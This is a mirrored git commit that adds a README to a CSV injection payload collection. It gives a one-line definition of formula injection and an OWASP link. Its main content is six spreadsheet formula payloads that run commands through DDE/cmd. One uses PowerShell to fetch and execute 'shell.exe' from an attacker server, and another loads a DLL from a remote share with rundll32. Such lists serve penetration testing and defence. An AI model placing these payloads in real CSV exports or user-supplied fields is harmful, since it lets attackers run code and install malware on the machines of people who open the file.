mirror of
https://github.com/payloadbox/csv-injection-payloads.git
synced 2025-12-17 17:55:43 +00:00
Merge pull request #1 from payloadbox/readme-file-update
Update README.md
This commit is contained in:
commit
83d615fb83
37
README.md
37
README.md
@ -1 +1,38 @@
|
|||||||
## CSV Injection Payloads
|
## CSV Injection Payloads
|
||||||
|
|
||||||
|
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.
|
||||||
|
|
||||||
|
#### Payloads :
|
||||||
|
|
||||||
|
```
|
||||||
|
DDE ("cmd";"/C calc";"!A0")A0
|
||||||
|
@SUM(1+9)*cmd|' /C calc'!A0
|
||||||
|
=10+20+cmd|' /C calc'!A0
|
||||||
|
=cmd|' /C notepad'!'A1'
|
||||||
|
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
|
||||||
|
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
|
||||||
|
```
|
||||||
|
|
||||||
|
#### References :
|
||||||
|
|
||||||
|
###### CSV Injection :
|
||||||
|
|
||||||
|
* 👉 https://owasp.org/www-community/attacks/CSV_Injection
|
||||||
|
|
||||||
|
##### Cloning an Existing Repository ( Clone with HTTPS )
|
||||||
|
```
|
||||||
|
root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git
|
||||||
|
```
|
||||||
|
|
||||||
|
##### Cloning an Existing Repository ( Clone with SSH )
|
||||||
|
```
|
||||||
|
root@ismailtasdelen:~# git clone git@github.com:payloadbox/csv-injection-payloads.git
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Donate!
|
||||||
|
|
||||||
|
Support the authors:
|
||||||
|
|
||||||
|
#### LiberaPay:
|
||||||
|
|
||||||
|
<noscript><a href="https://liberapay.com/ismailtasdelen/donate"><img alt="Donate using Liberapay" src="https://liberapay.com/assets/widgets/donate.svg"></a></noscript>
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user